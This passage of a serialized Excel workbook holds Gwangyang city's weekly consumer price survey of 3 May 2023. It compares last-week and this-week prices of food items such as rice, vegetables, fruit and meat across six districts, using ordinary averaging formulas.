{"text_format":"5","workbook":"xlsx","n_sheets":10,"sheets":["총괄","광양읍1","광양읍2","중마동1","중마동2","광영동","금호동","Sheet1","--------","Sheet2"],"props":{"creator":"jj8449","last_modified_by":"user"},"not_rendered":{"defined_names":19,"comments":4},"read":"whole","date_system":"1900"}

{"sheet":"총괄","index":0,"n_rows":100,"n_cols":31,"rows_kept":100,"merged":[[1,0,1,26],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,3,3,4],[3,5,3,8],[3,9,3,11],[3,12,3,14],[3,15,3,17],[3,18,3,20],[3,21,3,23],[3,24,3,26],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
["`"]
["주  간  물  가  조  사  표 (광 양 시 총 괄)"]
["조사일 : 2023. 5. 3."]
["연번","품목","규격·단위","카운트",null,"평     균",{"$nulls":3},"가격동향(광양읍1)",null,null,"가격동향(광양읍2)",null,null,"가격동향(중마동1)",null,null,"가격동향(중마동2)",null,null,"가격동향(광영)",null,null,"가격동향(금호)"]
[{"$nulls":3},"전주","금주","전주","금주","증감액","증감율","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액","전주","금주","증감액"]
["농·축·수산물(26개 품목)"]
[1,"쌀","일반미 20kg(풍광수토)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(M7,\"<>0\")+COUNTIF(P7,\"<>0\")+COUNTIF(S7,\"<>0\")+COUNTIF(V7,\"<>0\")+COUNTIF(Y7,\"<>0\")","v":6},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(N7,\"<>0\")+COUNTIF(Q7,\"<>0\")+COUNTIF(T7,\"<>0\")+COUNTIF(W7,\"<>0\")+COUNTIF(Z7,\"<>0\")","v":6},{"$f":"IF(D7=0,0,SUM(J7,M7,P7,S7,V7,Y7)/D7)","v":{"v":56108.333333333336,"d":"56,108"}},{"$f":"IF(E7=0,0,SUM(K7,N7,Q7,T7,W7,Z7)/E7)","v":{"v":56958.333333333336,"d":"56,958"}},{"$f":"SUM(G7-F7)","v":850},{"$f":"IF(F7=0,0,((G7-F7)/F7))","v":{"v":0.015149264815089856,"d":"0"}},{"$f":"광양읍1!F7","v":{"v":58750,"d":"58,750"}},{"$f":"광양읍1!G7","v":{"v":59750,"d":"59,750"}},{"$f":"광양읍1!H7","v":1000},{"$f":"광양읍2!F7","v":{"v":53500,"d":"53,500"}},{"$f":"광양읍2!G7","v":{"v":53500,"d":"53,500"}},{"$f":"광양읍2!H7","v":0},{"$f":"중마동1!F7","v":{"v":58950,"d":"58,950"}},{"$f":"중마동1!G7","v":{"v":58950,"d":"58,950"}},{"$f":"중마동1!H7","v":0},{"$f":"중마동2!F7","v":{"v":55250,"d":"55,250"}},{"$f":"중마동2!G7","v":{"v":55250,"d":"55,250"}},{"$f":"중마동2!H7","v":0},{"$f":"광영동!F7","v":{"v":51800,"d":"51,800"}},{"$f":"광영동!G7","v":{"v":55900,"d":"55,900"}},{"$f":"광영동!H7","v":{"v":4100,"d":"4,100"}},{"$f":"금호동!F7","v":{"v":58400,"d":"58,400"}},{"$f":"금호동!G7","v":{"v":58400,"d":"58,400"}},{"$f":"금호동!H7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(M8,\"<>0\")+COUNTIF(P8,\"<>0\")+COUNTIF(S8,\"<>0\")+COUNTIF(V8,\"<>0\")+COUNTIF(Y8,\"<>0\")","v":6},{"$f":"COUNTIF(K8,\"<>0\")+COUNTIF(N8,\"<>0\")+COUNTIF(Q8,\"<>0\")+COUNTIF(T8,\"<>0\")+COUNTIF(W8,\"<>0\")+COUNTIF(Z8,\"<>0\")","v":6},{"$f":"IF(D8=0,0,SUM(J8,M8,P8,S8,V8,Y8)/D8)","v":{"v":1554,"d":"1,554"}},{"$f":"IF(E8=0,0,SUM(K8,N8,Q8,T8,W8,Z8)/E8)","v":{"v":1487.5833333333333,"d":"1,488"}},{"$f":"SUM(G8-F8)","v":{"v":-66.41666666666674,"d":"-66"}},{"$f":"IF(F8=0,0,((G8-F8)/F8))","v":{"v":-0.04273916773916779,"d":"-0"}},{"$f":"광양읍1!F8","v":{"v":1566.5,"d":"1,567"}},{"$f":"광양읍1!G8","v":{"v":1493,"d":"1,493"}},{"$f":"광양읍1!H8","v":-73.5},{"$f":"광양읍2!F8","v":{"v":2150,"d":"2,150"}},{"$f":"광양읍2!G8","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!H8","v":-150},{"$f":"중마동1!F8","v":{"v":1117.5,"d":"1,118"}},{"$f":"중마동1!G8","v":{"v":992.5,"d":"993"}},{"$f":"중마동1!H8","v":-125},{"$f":"중마동2!F8","v":{"v":1500,"d":"1,500"}},{"$f":"중마동2!G8","v":{"v":1500,"d":"1,500"}},{"$f":"중마동2!H8","v":0},{"$f":"광영동!F8","v":{"v":1300,"d":"1,300"}},{"$f":"광영동!G8","v":{"v":1300,"d":"1,300"}},0,{"$f":"금호동!F8","v":{"v":1690,"d":"1,690"}},{"$f":"금호동!G8","v":{"v":1640,"d":"1,640"}},{"$f":"금호동!H8","v":-50},{"$nulls":3},"("]
[3,"상추","잎상추 500g",6,6,{"v":5296.75,"d":"5,297"},{"v":4606.166666666667,"d":"4,606"},{"$f":"SUM(G9-F9)","v":{"v":-690.583333333333,"d":"-691"}},{"$f":"IF(F9=0,0,((G9-F9)/F9))","v":{"v":-0.130378691335882,"d":"-0"}},{"$f":"광양읍1!F9","v":{"v":5290.5,"d":"5,291"}},{"$f":"광양읍1!G9","v":{"v":5517,"d":"5,517"}},{"$f":"광양읍1!H9","v":226.5},{"$f":"광양읍2!F9","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍2!G9","v":{"v":4250,"d":"4,250"}},{"$f":"광양읍2!H9","v":-250},{"$f":"중마동1!F9","v":{"v":5940,"d":"5,940"}},{"$f":"중마동1!G9","v":{"v":4205,"d":"4,205"}},{"$f":"중마동1!H9","v":{"v":-1735,"d":"-1,735"}},{"$f":"중마동2!F9","v":{"v":5450,"d":"5,450"}},{"$f":"중마동2!G9","v":{"v":5450,"d":"5,450"}},{"$f":"중마동2!H9","v":0},{"$f":"광영동!F9","v":{"v":3750,"d":"3,750"}},{"$f":"광영동!G9","v":{"v":3725,"d":"3,725"}},{"$f":"광영동!H9","v":-25},{"$f":"금호동!F9","v":{"v":6850,"d":"6,850"}},{"$f":"금호동!G9","v":{"v":4490,"d":"4,490"}},{"$f":"금호동!H9","v":{"v":-2360,"d":"-2,360"}}]
[4,"양상추","상품1개(500g)",6,6,{"v":2387.8333333333335,"d":"2,388"},{"v":2321.6666666666665,"d":"2,322"},{"$f":"SUM(G10-F10)","v":{"v":-66.16666666666697,"d":"-66"}},{"$f":"IF(F10=0,0,((G10-F10)/F10))","v":{"v":-0.02770991833600906,"d":"-0"}},{"$f":"광양읍1!F10","v":{"v":2708,"d":"2,708"}},{"$f":"광양읍1!G10","v":{"v":1511,"d":"1,511"}},{"$f":"광양읍1!H10","v":-1197},{"$f":"광양읍2!F10","v":{"v":1950,"d":"1,950"}},{"$f":"광양읍2!G10","v":{"v":1950,"d":"1,950"}},{"$f":"광양읍2!H10","v":0},{"$f":"중마동1!F10","v":{"v":2045,"d":"2,045"}},{"$f":"중마동1!G10","v":{"v":1995,"d":"1,995"}},{"$f":"중마동1!H10","v":-50},{"$f":"중마동2!F10","v":{"v":2000,"d":"2,000"}},{"$f":"중마동2!G10","v":{"v":2600,"d":"2,600"}},{"$f":"중마동2!H10","v":600},{"$f":"광영동!F10","v":{"v":2150,"d":"2,150"}},{"$f":"광영동!G10","v":{"v":2400,"d":"2,400"}},{"$f":"광영동!H10","v":250},{"$f":"금호동!F10","v":{"v":3474,"d":"3,474"}},{"$f":"금호동!G10","v":{"v":3474,"d":"3,474"}},{"$f":"금호동!H10","v":0}]
[5,"애호박","상품1개(250~300g)",6,6,{"v":1627.5,"d":"1,628"},{"v":1610,"d":"1,610"},{"$f":"SUM(G11-F11)","v":{"v":-17.5,"d":"-18"}},{"$f":"IF(F11=0,0,((G11-F11)/F11))","v":{"v":-0.010752688172043012,"d":"-0"}},{"$f":"광양읍1!F11","v":{"v":1445,"d":"1,445"}},{"$f":"광양읍1!G11","v":{"v":1395,"d":"1,395"}},{"$f":"광양읍1!H11","v":-50},{"$f":"광양읍2!F11","v":{"v":2350,"d":"2,350"}},{"$f":"광양읍2!G11","v":{"v":1950,"d":"1,950"}},{"$f":"광양읍2!H11","v":-400},{"$f":"중마동1!F11","v":{"v":1290,"d":"1,290"}},{"$f":"중마동1!G11","v":{"v":1835,"d":"1,835"}},{"$f":"중마동1!H11","v":545},{"$f":"중마동2!F11","v":{"v":2000,"d":"2,000"}},{"$f":"중마동2!G11","v":{"v":1800,"d":"1,800"}},{"$f":"중마동2!H11","v":-200},{"$f":"광영동!F11","v":{"v":1440,"d":"1,440"}},{"$f":"광영동!G11","v":{"v":1440,"d":"1,440"}},0,{"$f":"금호동!F11","v":{"v":1240,"d":"1,240"}},{"$f":"금호동!G11","v":{"v":1240,"d":"1,240"}},{"$f":"금호동!H11","v":0}]
[6,"열무","상품 4kg(1단)",{"$f":"COUNTIF(J12,\"<>0\")+COUNTIF(M12,\"<>0\")+COUNTIF(P12,\"<>0\")+COUNTIF(S12,\"<>0\")+COUNTIF(V12,\"<>0\")+COUNTIF(Y12,\"<>0\")","v":5},{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(N12,\"<>0\")+COUNTIF(Q12,\"<>0\")+COUNTIF(T12,\"<>0\")+COUNTIF(W12,\"<>0\")+COUNTIF(Z12,\"<>0\")","v":5},{"v":10030.4,"d":"10,030"},{"v":8240.1,"d":"8,240"},{"$f":"SUM(G12-F12)","v":{"v":-1790.2999999999993,"d":"-1,790"}},{"$f":"IF(F12=0,0,((G12-F12)/F12))","v":{"v":-0.17848739830914015,"d":"-0"}},{"$f":"광양읍1!F12","v":{"v":10952,"d":"10,952"}},{"$f":"광양읍1!G12","v":{"v":12215.5,"d":"12,216"}},{"$f":"광양읍1!H12","v":1263.5},{"$f":"광양읍2!F12","v":0},{"$f":"광양읍2!G12","v":0},{"$f":"광양읍2!H12","v":0},{"$f":"중마동1!F12","v":{"v":7950,"d":"7,950"}},{"$f":"중마동1!G12","v":{"v":3485,"d":"3,485"}},{"$f":"중마동1!H12","v":{"v":-4465,"d":"-4,465"}},{"$f":"중마동2!F12","v":{"v":10000,"d":"10,000"}},{"$f":"중마동2!G12","v":{"v":10000,"d":"10,000"}},{"$f":"중마동2!H12","v":0},{"$f":"광영동!F12","v":{"v":9000,"d":"9,000"}},{"$f":"광영동!G12","v":{"v":7500,"d":"7,500"}},{"$f":"광영동!H12","v":{"v":-1500,"d":"-1,500"}},{"$f":"금호동!F12","v":{"v":12250,"d":"12,250"}},{"$f":"금호동!G12","v":{"v":8000,"d":"8,000"}},{"$f":"금호동!H12","v":{"v":-4250,"d":"-4,250"}}]
[7,"양파","1망 1kg",6,6,{"v":2935,"d":"2,935"},{"v":2845,"d":"2,845"},-90,{"v":-0.030664395229982966,"d":"-0"},{"$f":"광양읍1!F13","v":{"v":3245,"d":"3,245"}},{"$f":"광양읍1!G13","v":{"v":3245,"d":"3,245"}},{"$f":"광양읍1!H13","v":0},{"$f":"광양읍2!F13","v":{"v":3400,"d":"3,400"}},{"$f":"광양읍2!G13","v":{"v":2950,"d":"2,950"}},{"$f":"광양읍2!H13","v":-450},{"$f":"중마동1!F13","v":{"v":3000,"d":"3,000"}},{"$f":"중마동1!G13","v":{"v":2735,"d":"2,735"}},{"$f":"중마동1!H13","v":-265},{"$f":"중마동2!F13","v":{"v":3175,"d":"3,175"}},{"$f":"중마동2!G13","v":{"v":3250,"d":"3,250"}},{"$f":"중마동2!H13","v":75},{"$f":"광영동!F13","v":{"v":2150,"d":"2,150"}},{"$f":"광영동!G13","v":{"v":2250,"d":"2,250"}},{"$f":"광영동!H13","v":100},{"$f":"금호동!F13","v":{"v":2640,"d":"2,640"}},{"$f":"금호동!G13","v":{"v":2640,"d":"2,640"}},{"$f":"금호동!H13","v":0}]
[8,"오이","상품 3개",6,6,{"$f":"IF(D14=0,0,SUM(J14,M14,P14,S14,V14,Y14)/D14)","v":{"v":3677.0833333333335,"d":"3,677"}},{"v":3448.75,"d":"3,449"},{"v":-228.33333333333348,"d":"-228"},{"v":-0.0620963172804533,"d":"-0"},{"$f":"광양읍1!F14","v":{"v":3642.5,"d":"3,643"}},{"$f":"광양읍1!G14","v":{"v":3367.5,"d":"3,368"}},{"$f":"광양읍1!H14","v":-275},{"$f":"광양읍2!F14","v":{"v":3950,"d":"3,950"}},{"$f":"광양읍2!G14","v":{"v":3000,"d":"3,000"}},{"$f":"광양읍2!H14","v":-950},{"$f":"중마동1!F14","v":{"v":3835,"d":"3,835"}},{"$f":"중마동1!G14","v":{"v":3485,"d":"3,485"}},{"$f":"중마동1!H14","v":-350},{"$f":"중마동2!F14","v":{"v":3900,"d":"3,900"}},{"$f":"중마동2!G14","v":{"v":4350,"d":"4,350"}},{"$f":"중마동2!H14","v":450},{"$f":"광영동!F14","v":{"v":3750,"d":"3,750"}},{"$f":"광영동!G14","v":{"v":3450,"d":"3,450"}},{"$f":"광영동!H14","v":-300},{"$f":"금호동!F14","v":{"v":2985,"d":"2,985"}},{"$f":"금호동!G14","v":{"v":3040,"d":"3,040"}},{"$f":"금호동!H14","v":55}]
[9,"풋고추","신선한것 1kg",6,6,{"v":13052.25,"d":"13,052"},{"v":11691.083333333334,"d":"11,691"},{"v":-1361.166666666666,"d":"-1,361"},{"v":-0.10428597879037453,"d":"-0"},{"$f":"광양읍1!F15","v":{"v":12403.5,"d":"12,404"}},{"$f":"광양읍1!G15","v":{"v":9711.5,"d":"9,712"}},{"$f":"광양읍1!H15","v":-2692},{"$f":"광양읍2!F15","v":{"v":12000,"d":"12,000"}},{"$f":"광양읍2!G15","v":{"v":8500,"d":"8,500"}},{"$f":"광양읍2!H15","v":{"v":-3500,"d":"-3,500"}},{"$f":"중마동1!F15","v":{"v":19260,"d":"19,260"}},{"$f":"중마동1!G15","v":{"v":14035,"d":"14,035"}},{"$f":"중마동1!H15","v":{"v":-5225,"d":"-5,225"}},{"$f":"중마동2!F15","v":{"v":10550,"d":"10,550"}},{"$f":"중마동2!G15","v":{"v":11050,"d":"11,050"}},{"$f":"중마동2!H15","v":500},{"$f":"광영동!F15","v":{"v":8900,"d":"8,900"}},{"$f":"광영동!G15","v":{"v":7950,"d":"7,950"}},{"$f":"광영동!H15","v":-950},{"$f":"금호동!F15","v":{"v":15200,"d":"15,200"}},{"$f":"금호동!G15","v":{"v":18900,"d":"18,900"}},{"$f":"금호동!H15","v":{"v":3700,"d":"3,700"}}]
[10,"마늘","깐것 상품 1kg",6,6,{"v":10866.666666666666,"d":"10,867"},{"$f":"IF(E16=0,0,SUM(K16,N16,Q16,T16,W16,Z16)/E16)","v":{"v":11457.5,"d":"11,458"}},{"v":590.8333333333339,"d":"591"},{"v":0.05437116564417184,"d":"0"},{"$f":"광양읍1!F16","v":{"v":9350,"d":"9,350"}},{"$f":"광양읍1!G16","v":{"v":9350,"d":"9,350"}},{"$f":"광양읍1!H16","v":0},{"$f":"광양읍2!F16","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍2!G16","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍2!H16","v":0},{"$f":"중마동1!F16","v":{"v":10900,"d":"10,900"}},{"$f":"중마동1!G16","v":{"v":10245,"d":"10,245"}},{"$f":"중마동1!H16","v":-655},{"$f":"중마동2!F16","v":{"v":10500,"d":"10,500"}},{"$f":"중마동2!G16","v":{"v":10500,"d":"10,500"}},{"$f":"중마동2!H16","v":0},{"$f":"광영동!F16","v":{"v":9450,"d":"9,450"}},{"$f":"광영동!G16","v":{"v":9250,"d":"9,250"}},{"$f":"광영동!H16","v":-200},{"$f":"금호동!F16","v":{"v":12000,"d":"12,000"}},{"$f":"금호동!G16","v":{"v":16400,"d":"16,400"}},{"$f":"금호동!H16","v":{"v":4400,"d":"4,400"}}]
[11,"감자","흰색 1kg",6,6,{"v":6310.833333333333,"d":"6,311"},{"v":6185.833333333333,"d":"6,186"},-125,{"v":-0.019807209824376074,"d":"-0"},{"$f":"광양읍1!F17","v":{"v":6350,"d":"6,350"}},{"$f":"광양읍1!G17","v":{"v":6350,"d":"6,350"}},{"$f":"광양읍1!H17","v":0},{"$f":"광양읍2!F17","v":{"v":7000,"d":"7,000"}},{"$f":"광양읍2!G17","v":{"v":6500,"d":"6,500"}},{"$f":"광양읍2!H17","v":-500},{"$f":"중마동1!F17","v":{"v":7335,"d":"7,335"}},{"$f":"중마동1!G17","v":{"v":7335,"d":"7,335"}},{"$f":"중마동1!H17","v":0},{"$f":"중마동2!F17","v":{"v":5950,"d":"5,950"}},{"$f":"중마동2!G17","v":{"v":5950,"d":"5,950"}},{"$f":"중마동2!H17","v":0},{"$f":"광영동!F17","v":{"v":5450,"d":"5,450"}},{"$f":"광영동!G17","v":{"v":5450,"d":"5,450"}},{"$f":"광영동!H17","v":0},{"$f":"금호동!F17","v":{"v":5780,"d":"5,780"}},{"$f":"금호동!G17","v":{"v":5530,"d":"5,530"}},{"$f":"금호동!H17","v":-250}]
[12,"배추","1포기 3kg",6,6,{"v":4308.833333333333,"d":"4,309"},{"v":4293.833333333333,"d":"4,294"},-15,{"v":-0.003481220748075659,"d":"-0"},{"$f":"광양읍1!F18","v":{"v":5328,"d":"5,328"}},{"$f":"광양읍1!G18","v":{"v":5328,"d":"5,328"}},{"$f":"광양읍1!H18","v":0},{"$f":"광양읍2!F18","v":{"v":1650,"d":"1,650"}},{"$f":"광양읍2!G18","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!H18","v":350},{"$f":"중마동1!F18","v":{"v":3985,"d":"3,985"}},{"$f":"중마동1!G18","v":{"v":4295,"d":"4,295"}},{"$f":"중마동1!H18","v":310},{"$f":"중마동2!F18","v":{"v":6250,"d":"6,250"}},{"$f":"중마동2!G18","v":{"v":5500,"d":"5,500"}},{"$f":"중마동2!H18","v":-750},{"$f":"광영동!F18","v":{"v":4250,"d":"4,250"}},{"$f":"광영동!G18","v":{"v":4250,"d":"4,250"}},{"$f":"광영동!H18","v":0},{"$f":"금호동!F18","v":{"v":4390,"d":"4,390"}},{"$f":"금호동!G18","v":{"v":4390,"d":"4,390"}},{"$f":"금호동!H18","v":0}]
[13,"콩나물","1봉지 500g ",{"$f":"COUNTIF(J19,\"<>0\")+COUNTIF(M19,\"<>0\")+COUNTIF(P19,\"<>0\")+COUNTIF(S19,\"<>0\")+COUNTIF(V19,\"<>0\")+COUNTIF(Y19,\"<>0\")","v":6},{"$f":"COUNTIF(K19,\"<>0\")+COUNTIF(N19,\"<>0\")+COUNTIF(Q19,\"<>0\")+COUNTIF(T19,\"<>0\")+COUNTIF(W19,\"<>0\")+COUNTIF(Z19,\"<>0\")","v":6},{"v":2055.4166666666665,"d":"2,055"},{"v":2055.4166666666665,"d":"2,055"},0,0,{"$f":"광양읍1!F19","v":{"v":2157.5,"d":"2,158"}},{"$f":"광양읍1!G19","v":{"v":2157.5,"d":"2,158"}},{"$f":"광양읍1!H19","v":0},{"$f":"광양읍2!F19","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!G19","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!H19","v":0},{"$f":"중마동1!F19","v":{"v":2375,"d":"2,375"}},{"$f":"중마동1!G19","v":{"v":2375,"d":"2,375"}},{"$f":"중마동1!H19","v":0},{"$f":"중마동2!F19","v":{"v":1650,"d":"1,650"}},{"$f":"중마동2!G19","v":{"v":1650,"d":"1,650"}},{"$f":"중마동2!H19","v":0},{"$f":"광영동!F19","v":{"v":1650,"d":"1,650"}},{"$f":"광영동!G19","v":{"v":1650,"d":"1,650"}},{"$f":"광영동!H19","v":0},{"$f":"금호동!F19","v":{"v":2500,"d":"2,500"}},{"$f":"금호동!G19","v":{"v":2500,"d":"2,500"}},{"$f":"금호동!H19","v":0}]
[14,"사과","상품 1개(300∼350g)",{"$f":"COUNTIF(J20,\"<>0\")+COUNTIF(M20,\"<>0\")+COUNTIF(P20,\"<>0\")+COUNTIF(S20,\"<>0\")+COUNTIF(V20,\"<>0\")+COUNTIF(Y20,\"<>0\")","v":6},{"$f":"COUNTIF(K20,\"<>0\")+COUNTIF(N20,\"<>0\")+COUNTIF(Q20,\"<>0\")+COUNTIF(T20,\"<>0\")+COUNTIF(W20,\"<>0\")+COUNTIF(Z20,\"<>0\")","v":6},{"v":2672.5,"d":"2,673"},{"v":2590,"d":"2,590"},{"v":-82.5,"d":"-83"},{"v":-0.03086997193638915,"d":"-0"},{"$f":"광양읍1!F20","v":{"v":2950,"d":"2,950"}},{"$f":"광양읍1!G20","v":{"v":2950,"d":"2,950"}},{"$f":"광양읍1!H20","v":0},{"$f":"광양읍2!F20","v":{"v":2250,"d":"2,250"}},{"$f":"광양읍2!G20","v":{"v":2250,"d":"2,250"}},{"$f":"광양읍2!H20","v":0},{"$f":"중마동1!F20","v":{"v":2095,"d":"2,095"}},{"$f":"중마동1!G20","v":{"v":1700,"d":"1,700"}},{"$f":"중마동1!H20","v":-395},{"$f":"중마동2!F20","v":{"v":1550,"d":"1,550"}},{"$f":"중마동2!G20","v":{"v":1550,"d":"1,550"}},{"$f":"중마동2!H20","v":0},{"$f":"광영동!F20","v":{"v":3950,"d":"3,950"}},{"$f":"광영동!G20","v":{"v":3850,"d":"3,850"}},{"$f":"광영동!H20","v":-100},{"$f":"금호동!F20","v":{"v":3240,"d":"3,240"}},{"$f":"금호동!G20","v":{"v":3240,"d":"3,240"}},{"$f":"금호동!H20","v":0}]
[15,"배","상품 1개(650∼700g)",6,6,{"v":3631.6666666666665,"d":"3,632"},{"v":3250.5833333333335,"d":"3,251"},{"v":-381.08333333333303,"d":"-381"},{"v":-0.10493345571363002,"d":"-0"},{"$f":"광양읍1!F21","v":{"v":3650,"d":"3,650"}},{"$f":"광양읍1!G21","v":{"v":3650,"d":"3,650"}},{"$f":"광양읍1!H21","v":0},{"$f":"광양읍2!F21","v":{"v":3250,"d":"3,250"}},{"$f":"광양읍2!G21","v":{"v":3375,"d":"3,375"}},{"$f":"광양읍2!H21","v":125},{"$f":"중마동1!F21","v":{"v":2990,"d":"2,990"}},{"$f":"중마동1!G21","v":{"v":1845,"d":"1,845"}},{"$f":"중마동1!H21","v":{"v":-1145,"d":"-1,145"}},{"$f":"중마동2!F21","v":{"v":3250,"d":"3,250"}},{"$f":"중마동2!G21","v":{"v":3250,"d":"3,250"}},{"$f":"중마동2!H21","v":0},{"$f":"광영동!F21","v":{"v":3750,"d":"3,750"}},{"$f":"광영동!G21","v":{"v":3750,"d":"3,750"}},{"$f":"광영동!H21","v":0},{"$f":"금호동!F21","v":{"v":4900,"d":"4,900"}},{"$f":"금호동!G21","v":{"v":3633.5,"d":"3,634"}},{"$f":"금호동!H21","v":{"v":-1266.5,"d":"-1,267"}}]
[16,"바나나","상품 1kg",6,6,{"v":4089.4166666666665,"d":"4,089"},{"v":4097.916666666667,"d":"4,098"},{"v":8.500000000000455,"d":"9"},{"v":0.002078536058525166,"d":"0"},{"$f":"광양읍1!F22","v":{"v":3201.5,"d":"3,202"}},{"$f":"광양읍1!G22","v":{"v":3027.5,"d":"3,028"}},{"$f":"광양읍1!H22","v":-174},{"$f":"광양읍2!F22","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍2!G22","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍2!H22","v":0},{"$f":"중마동1!F22","v":{"v":4720,"d":"4,720"}},{"$f":"중마동1!G22","v":{"v":4970,"d":"4,970"}},{"$f":"중마동1!H22","v":250},{"$f":"중마동2!F22","v":{"v":5050,"d":"5,050"}},{"$f":"중마동2!G22","v":{"v":4700,"d":"4,700"}},{"$f":"중마동2!H22","v":-350},{"$f":"광영동!F22","v":{"v":3675,"d":"3,675"}},{"$f":"광영동!G22","v":{"v":3650,"d":"3,650"}},{"$f":"광영동!H22","v":-25},{"$f":"금호동!F22","v":{"v":3890,"d":"3,890"}},{"$f":"금호동!G22","v":{"v":4240,"d":"4,240"}},{"$f":"금호동!H22","v":350}]
[17,"쇠고기\n(한우)","등심 600g(상등육)",6,6,{"v":69861.5,"d":"69,862"},{"v":67928.16666666667,"d":"67,928"},{"v":-1933.3333333333285,"d":"-1,933"},{"v":-0.02767380221342697,"d":"-0"},{"$f":"광양읍1!F23","v":{"v":72000,"d":"72,000"}},{"$f":"광양읍1!G23","v":{"v":72000,"d":"72,000"}},{"$f":"광양읍1!H23","v":0},{"$f":"광양읍2!F23","v":{"v":60000,"d":"60,000"}},{"$f":"광양읍2!G23","v":{"v":60000,"d":"60,000"}},{"$f":"광양읍2!H23","v":0},{"$f":"중마동1!F23","v":{"v":89370,"d":"89,370"}},{"$f":"중마동1!G23","v":{"v":71370,"d":"71,370"}},{"$f":"중마동1!H23","v":{"v":-18000,"d":"-18,000"}},{"$f":"중마동2!F23","v":{"v":61500,"d":"61,500"}},{"$f":"중마동2!G23","v":{"v":73000,"d":"73,000"}},{"$f":"중마동2!H23","v":{"v":11500,"d":"11,500"}},{"$f":"광영동!F23","v":{"v":52500,"d":"52,500"}},{"$f":"광영동!G23","v":{"v":47400,"d":"47,400"}},{"$f":"광영동!H23","v":{"v":-5100,"d":"-5,100"}},{"$f":"금호동!F23","v":{"v":83799,"d":"83,799"}},{"$f":"금호동!G23","v":{"v":83799,"d":"83,799"}},{"$f":"금호동!H23","v":0}]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",{"$f":"COUNTIF(J24,\"<>0\")+COUNTIF(M24,\"<>0\")+COUNTIF(P24,\"<>0\")+COUNTIF(S24,\"<>0\")+COUNTIF(V24,\"<>0\")+COUNTIF(Y24,\"<>0\")","v":5},{"$f":"COUNTIF(K24,\"<>0\")+COUNTIF(N24,\"<>0\")+COUNTIF(Q24,\"<>0\")+COUNTIF(T24,\"<>0\")+COUNTIF(W24,\"<>0\")+COUNTIF(Z24,\"<>0\")","v":5},{"v":25980,"d":"25,980"},{"v":23580,"d":"23,580"},{"v":-2400,"d":"-2,400"},{"v":-0.09237875288683603,"d":"-0"},{"$f":"광양읍1!F24","v":0},{"$f":"광양읍1!G24","v":0},{"$f":"광양읍1!H24","v":0},{"$f":"광양읍2!F24","v":{"v":27900,"d":"27,900"}},{"$f":"광양읍2!G24","v":{"v":27900,"d":"27,900"}},{"$f":"광양읍2!H24","v":0},{"$f":"중마동1!F24","v":{"v":18900,"d":"18,900"}},{"$f":"중마동1!G24","v":{"v":18900,"d":"18,900"}},{"$f":"중마동1!H24","v":0},{"$f":"중마동2!F24","v":{"v":13500,"d":"13,500"}},{"$f":"중마동2!G24","v":{"v":13500,"d":"13,500"}},{"$f":"중마동2!H24","v":0},{"$f":"광영동!F24","v":{"v":30000,"d":"30,000"}},{"$f":"광영동!G24","v":{"v":30000,"d":"30,000"}},{"$f":"광영동!H24","v":0},{"$f":"금호동!F24","v":{"v":39600,"d":"39,600"}},{"$f":"금호동!G24","v":{"v":27600,"d":"27,600"}},{"$f":"금호동!H24","v":{"v":-12000,"d":"-12,000"}}]
[19,"돼지고기","삼겹살 600g(상등육)",6,6,{"v":15405,"d":"15,405"},{"v":16875,"d":"16,875"},{"v":1470,"d":"1,470"},{"v":0.09542356377799416,"d":"0"},{"$f":"광양읍1!F25","v":{"v":15300,"d":"15,300"}},{"$f":"광양읍1!G25","v":{"v":15300,"d":"15,300"}},{"$f":"광양읍1!H25","v":0},{"$f":"광양읍2!F25","v":{"v":16160,"d":"16,160"}},{"$f":"광양읍2!G25","v":{"v":17100,"d":"17,100"}},{"$f":"광양읍2!H25","v":940},{"$f":"중마동1!F25","v":{"v":17010,"d":"17,010"}},{"$f":"중마동1!G25","v":{"v":22110,"d":"22,110"}},{"$f":"중마동1!H25","v":{"v":5100,"d":"5,100"}},{"$f":"중마동2!F25","v":{"v":14590,"d":"14,590"}},{"$f":"중마동2!G25","v":{"v":15810,"d":"15,810"}},{"$f":"중마동2!H25","v":{"v":1220,"d":"1,220"}},{"$f":"광영동!F25","v":{"v":14340,"d":"14,340"}},{"$f":"광영동!G25","v":{"v":13140,"d":"13,140"}},{"$f":"광영동!H25","v":{"v":-1200,"d":"-1,200"}},{"$f":"금호동!F25","v":{"v":15030,"d":"15,030"}},{"$f":"금호동!G25","v":{"v":17790,"d":"17,790"}},{"$f":"금호동!H25","v":{"v":2760,"d":"2,760"}}]
[20,"닭고기","육계 1마리(1kg 정도)",6,6,{"v":8737.5,"d":"8,738"},{"v":8945.833333333334,"d":"8,946"},{"v":208.33333333333394,"d":"208"},{"v":0.023843586075345802,"d":"0"},{"$f":"광양읍1!F26","v":{"v":8900,"d":"8,900"}},{"$f":"광양읍1!G26","v":{"v":8900,"d":"8,900"}},{"$f":"광양읍1!H26","v":0},{"$f":"광양읍2!F26","v":{"v":8750,"d":"8,750"}},{"$f":"광양읍2!G26","v":{"v":8750,"d":"8,750"}},{"$f":"광양읍2!H26","v":0},{"$f":"중마동1!F26","v":{"v":8695,"d":"8,695"}},{"$f":"중마동1!G26","v":{"v":8695,"d":"8,695"}},{"$f":"중마동1!H26","v":0},{"$f":"중마동2!F26","v":{"v":8450,"d":"8,450"}},{"$f":"중마동2!G26","v":{"v":8650,"d":"8,650"}},{"$f":"중마동2!H26","v":200},{"$f":"광영동!F26","v":{"v":8450,"d":"8,450"}},{"$f":"광영동!G26","v":{"v":8450,"d":"8,450"}},{"$f":"광영동!H26","v":0},{"$f":"금호동!F26","v":{"v":9180,"d":"9,180"}},{"$f":"금호동!G26","v":{"v":10230,"d":"10,230"}},{"$